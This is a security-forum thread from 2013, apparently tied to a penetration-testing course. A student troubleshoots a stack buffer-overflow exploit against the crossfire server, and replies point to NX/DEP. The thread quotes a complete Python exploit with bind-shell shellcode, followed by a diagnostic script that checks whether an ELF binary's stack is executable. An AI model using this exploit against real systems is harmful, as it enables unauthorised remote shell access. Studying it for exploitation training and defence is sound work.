Linux Memory Protection

zaixer
Newbie
Posts: 9
Joined: Thu Jun 13, 2013 12:33 pm
Post Tue Jul 02, 2013 2:37 pm

Linux Memory Protection

Hi all,

I am practicing Linux BOF exploitation. When trying to exploit a vulnerability in crossfire, everything works well and I get the shellcode placed in the right place, and the program flow gets redirected to the shellcode; however, when it starts executing the shellcode, the program fails.

OS version (bt5 R3):
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux

exploit code:

#!/usr/bin/python
import socket, sys
host = sys.argv[1]

#0x8134e77 jump eax
#0xb7dadad6 nop sled address

# Shellcode payload; the leading \xcc is an int3 breakpoint instruction,
# which is why the debugger stops right before the shellcode executes.
shellcode= ("\xcc\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80")

# NOP sled, shellcode, filler up to the saved return address, the sled
# address 0xb7dadad6 in little-endian byte order, then trailing padding.
crash = "\x90" *199 + shellcode + "\x43" * 4090 + "\xd6\xda\xda\xb7" + "D" * 7

# The overflowing buffer is delivered inside the "setup sound" command.
buffer= "\x11(setup sound " + crash + "\x90\x00#"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
s.connect((host, 13327))
print (s.recv(1024))

s.send(buffer)
s.close()
print "[*]Payload Sent !"

I placed a breakpoint before the shellcode, and the execution flow hits it successfully; however, after continuing, the program crashes and gives the following message:

"Program received signal SIGSEGV, Segmentation fault.
0xb7daeb36 in ?? ()"

When inspecting this address, it's full of zeros!

I already disabled ASLR before starting the exercise, and I am wondering: does any other protection mechanism exist that prevents exploitation?
dynamik
Recruiters
Posts: 1119
Joined: Sun Nov 09, 2008 11:00 am
Location: Mile High City
Post Mon Jul 08, 2013 2:36 pm

Re: Linux Memory Protection

DEP? Maybe try an older distro like Ubuntu 7.04.

Also, have you filtered out bad characters? Does your shellcode arrive completely intact?
The day you stop learning is the day you start becoming obsolete.
m0wgli
Sr. Member
Posts: 308
Joined: Fri Jul 20, 2012 3:34 pm
Post Mon Jul 08, 2013 4:52 pm

Re: Linux Memory Protection

zaixer wrote: I already disabled ASLR before starting the exercise, and I am wondering: does any other protection mechanism exist that prevents exploitation?

Are you doing the Offensive Security Penetration Testing with BackTrack (PWB) course?
Security + | OSWP | eCPPT (Silver & Gold) | CSTA
zaixer
Newbie
Posts: 9
Joined: Thu Jun 13, 2013 12:33 pm
Post Fri Jul 12, 2013 9:51 pm

Re: Linux Memory Protection

I think DEP is Windows-based and NX is Linux-based... correct me please if I am wrong. The point is not only to make it work; it's about understanding why it did not work :). I do not like leaving it just because it did not work :)
testdotphp
Newbie
Posts: 6
Joined: Tue Jul 02, 2013 7:39 am
Post Mon Jul 15, 2013 8:45 am

Re: Linux Memory Protection

zaixer wrote: I think DEP is Windows-based and NX is Linux-based... correct me please if I am wrong.

DEP is not Windows-only and is even supported by phone OSes like iOS and Android.
Also, the "never execute bit" is part of the CPU and is supported by quite a few operating systems now. The never execute bit was a large part of the MS08-067 "thing", as well.
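The thread's open question, whether some protection beyond ASLR is stopping the shellcode, can be settled by checking how the target binary's stack is marked. The script below is an added example, not code from this thread or from the crossfire project: it parses an ELF image's program headers and reports whether the PT_GNU_STACK entry requests an executable stack. The two sample images are constructed inline, and the optional path argument is an assumed command-line interface.

```python
import struct
import sys
# Program-header type and flag constants from the ELF specification.
PT_GNU_STACK = 0x6474E551
PF_X = 0x1

def stack_is_executable(elf_bytes):
    """True if PT_GNU_STACK carries PF_X (executable stack), False if it does
    not, None if the header is absent (the kernel then defaults to exec-stack)."""
    if elf_bytes[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    endian = "<" if elf_bytes[5] == 1 else ">"  # EI_DATA: 1 = little-endian
    if elf_bytes[4] == 1:  # ELFCLASS32: p_flags is the 7th phdr field
        (e_phoff,) = struct.unpack_from(endian + "I", elf_bytes, 28)
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", elf_bytes, 42)
        phdr_fmt, flags_idx = endian + "IIIIIIII", 6
    elif elf_bytes[4] == 2:  # ELFCLASS64: p_flags is the 2nd phdr field
        (e_phoff,) = struct.unpack_from(endian + "Q", elf_bytes, 32)
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", elf_bytes, 54)
        phdr_fmt, flags_idx = endian + "IIQQQQQQ", 1
    else:
        raise ValueError("unknown ELF class")
    for i in range(e_phnum):
        phdr = struct.unpack_from(phdr_fmt, elf_bytes, e_phoff + i * e_phentsize)
        if phdr[0] == PT_GNU_STACK:
            return bool(phdr[flags_idx] & PF_X)
    return None

def make_elf32_with_gnu_stack(p_flags):
    """Constructed minimal i386 ELF image (header + one PT_GNU_STACK phdr);
    sample input only, not a real binary."""
    ident = b"\x7fELF" + bytes([1, 1, 1]) + b"\x00" * 9  # 32-bit, LE, v1
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0x8048000, 52, 0, 0,
                               52, 32, 1, 40, 0, 0)
    phdr = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, p_flags, 16)
    return ehdr + phdr

if __name__ == "__main__":
    if len(sys.argv) > 1:  # assumed CLI: inspect a real binary by path
        with open(sys.argv[1], "rb") as f:
            images = {sys.argv[1]: f.read()}
    else:
        images = {"sample-rwx-stack": make_elf32_with_gnu_stack(0x7),
                  "sample-rw-stack": make_elf32_with_gnu_stack(0x6)}
    for name, data in images.items():
        state = {True: "executable (stack-resident code can run)",
                 False: "non-executable (NX: jumping into stack data faults)",
                 None: "no PT_GNU_STACK header"}[stack_is_executable(data)]
        print("%-18s stack: %s" % (name, state))
```

On a real system `readelf -l <binary>` prints the same GNU_STACK entry; a stack flagged RW rather than RWE is the NX/DEP case in which control transfer into stack data ends in exactly the SIGSEGV reported above.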
